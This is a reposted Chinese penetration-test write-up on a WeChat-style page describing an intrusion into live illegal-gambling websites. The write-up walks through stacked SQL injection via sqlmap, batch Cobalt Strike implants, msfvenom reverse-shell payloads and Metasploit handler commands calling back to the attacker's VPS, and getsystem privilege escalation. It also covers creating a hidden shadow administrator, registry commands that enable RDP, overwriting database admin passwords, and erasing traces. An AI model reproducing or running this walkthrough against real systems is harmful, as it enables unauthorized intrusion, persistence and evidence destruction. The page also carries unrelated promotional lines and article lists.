服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

实战|一次对BC网站的渗透测试

日期: 来源:信安黑客技术收集编辑:
作者:xzajyjs, 转载于FreeBuf.COM

法律声明

此渗透测试后已将所有信息移交警方,请勿用于非法用途。

信息搜集

首先当然是通过fofa进行bc网站的后台搜集(搜索语法大家自行探索),获得的qi牌bc站几乎都是一模一样,估计是分站。随便打开一个看看,是下图

sqlmap跑一把,发现存在堆叠注入。由于都是分站,因此存在相同漏洞的应该不少。

上线cs

写个脚本,批量上线cs。可以看到有个上线就直接是SYSTEM权限,这就很无聊了。我们拿个普通权限的进行进一步渗透测试

首先我们要提权,至少也得有Administrator权限吧。

提权

方式一(漏洞利用)

cs中执行run systeminfo收集目标安装的补丁,使用在线提权辅助工具查看能够利用的漏洞。查找exp并利用即可。

方式二(msf辅助提权)

要想利用msf辅助提权,必须要反弹shell到msf

一方面可以利用cs在目标机上执行msf生成的木马上线msf。我这里是cs服务端和msf在同一vps上

msfvenom -p windows/meterpreter_reverse_tcp lhost=x.x.x.x lport=8888 -f exe > shell.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter_reverse_tcp
show options
set lhost x.x.x.x
set lport 8888
run

shell.exe上传至目标并执行,即可看到msf已上线

或者直接通过cs进行会话派生spawn

cs上创建监听器

msf进行配置,注意这里两个payload要相互对应

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost x.x.x.x
set lport 8888
exploit

在msf中getuid查看到当前用户为mssqlsserver,利用msf自带的提权getsystem,居然直接就提权成功,拿到了system权限。

然后再利用system权限执行cs生成的shell,上线之后就是system权限了

当然我们获得system权限后可以注入进程,更安全一些

现在既然已经拿到了最高权限,那就可以为所欲为了。

后渗透

强烈建议创建一个影子管理员用户,请自行百度。

开启RDP

nmap扫一下发现3389端口未开

查看是否开启rdp
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

如未打开,使用下列命令打开
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

查看rdp端口
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

这个管理员看来还是有点安全意识的,吧RDP端口改成了39982;微信搜索公众号:Linux技术迷,回复:linux 领取资料 。

我们利用之前创建的影子用户进行RDP连接,直接就进到了桌面。可以看到这就是个“正儿八经“的bc网站(doge)

数据库

将mssql设置为windows登录验证,用影子用户连上他们的数据库看看

在一个数据表中找到后台登录的用户密码,很幸运密码直接就能用cmd5爆破出来。当然爆破不出来也没事,直接把我们自己的密码md5后直接修改数据表。

登进后台

横向移动

这就是个小型的分站,并没有加入域,单个的工作组,也就没有进行下去的必要了

打扫战场

没有做持久化的必要了,走之前打扫一下战场

总结

整个渗透过程(尤其是提权过程)都异常的顺利,虽然通过辅助平台查询后发现有多个漏洞可以利用,但没想到msf的getsystem直接就拿下了最高权限。


注:如有侵权请联系删除


读到这里说明你喜欢本公众号的文章,欢迎 置顶(标星)本公众号 Linux技术迷,这样就可以第一时间获取推送了~

在本公众号 Linux技术迷,后台回复:Linux,领取2T学习资料 !
1. Linux 中 find 命令的 35 个实际例子
2. 运维必备的《网络端口大全》,看这一份就够了
3. Linux 学习指南 (收藏篇)
4. 2万字系统总结,带你实现Linux命令自由

相关阅读

  • 安全日报(2023.03.29)

  • 赶紧点击上方话题进行订阅吧!报告编号:B6-2023-032999报告来源:360CERT报告作者:360CERT更新日期:2023-03-291 Security Incident|安全事件美国一律师事务所因数据泄露被罚20万美
  • CVE-2023-22809:Sudo权限提升漏洞通告

  • 赶紧点击上方话题进行订阅吧!报告编号:CERT-R-2023-70报告来源:360CERT报告作者:360CERT更新日期:2023-03-301 漏洞简述2023年03月30日,360CERT监测发现sudo发布了sudo的风险通告,
  • 安全日报(2023.03.30)

  • 赶紧点击上方话题进行订阅吧!报告编号:B6-2023-033099报告来源:360CERT报告作者:360CERT更新日期:2023-03-301 Security Incident|安全事件美国食品药品监督管理局推出维护医疗设
  • 安全日报(2023.04.26)

  • 赶紧点击上方话题进行订阅吧!报告编号:B6-2023-042699报告来源:360CERT报告作者:360CERT更新日期:2023-04-261 Security Incident|安全事件美国政府将于5月正式宣布制定物联网设
  • 安全日报(2023.04.27)

  • 赶紧点击上方话题进行订阅吧!报告编号:B6-2023-042799报告来源:360CERT报告作者:360CERT更新日期:2023-04-271 Security Incident|安全事件Clop和LockBit勒索软件团伙利用PaperCu
  • 安全日报(2023.04.28)

  • 赶紧点击上方话题进行订阅吧!报告编号:B6-2023-042899报告来源:360CERT报告作者:360CERT更新日期:2023-04-281 Security Incident|安全事件Lazarus、Scarcruft 朝鲜 APT 开始转变
  • 金华,一座再晚也有人等你回家的城市

  • ·你有多久没有回家看看了?记忆中的小桥流水、街头巷尾如今是否变了模样?时光飞逝故乡在发展中迎来蝶变不变的是亲人的牵挂是游子的乡愁奔波于世界的不同角落你可曾怀念那一盏

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四
  • 美国对华2000亿关税清单,到底影响有多大?

  • 1 今天A股大跌,上证最大跌幅超过2%。直接导火索是美国证实计划对华2000亿美元产品加征25%关税。 听起来,2000亿美元数目巨大,我们来算笔账。 2000亿美元,按现在人民币汇率

最新文章

  • 喜欢到一周去4次的咖啡馆,快点来喝!!!

  • 上海这小半年又冒出了好多咖啡新店,身为美食编辑也不得不感叹:虽然探店是日常工作的一部分,但我们的速度,已经跟不上开店的速度了!(可想而知这个市场有多卷......)不过,这两个月每天
  • 实战|一次对BC网站的渗透测试

  • 作者:xzajyjs, 转载于FreeBuf.COM法律声明此渗透测试后已将所有信息移交警方,请勿用于非法用途。信息搜集首先当然是通过fofa进行bc网站的后台搜集(搜索语法大家自行探索),获得的q
  • 为安全事 · 汇同行力 | 绿盟科技亮相RSA 2023

  • 全文共2832字,阅读大约需6分钟。一年一度的RSA大会于4月24日-27日在美国旧金山正式启幕,今年大会以 Stronger Together 为主题,聚力同心对话网络安全。作为全球规模最大的网络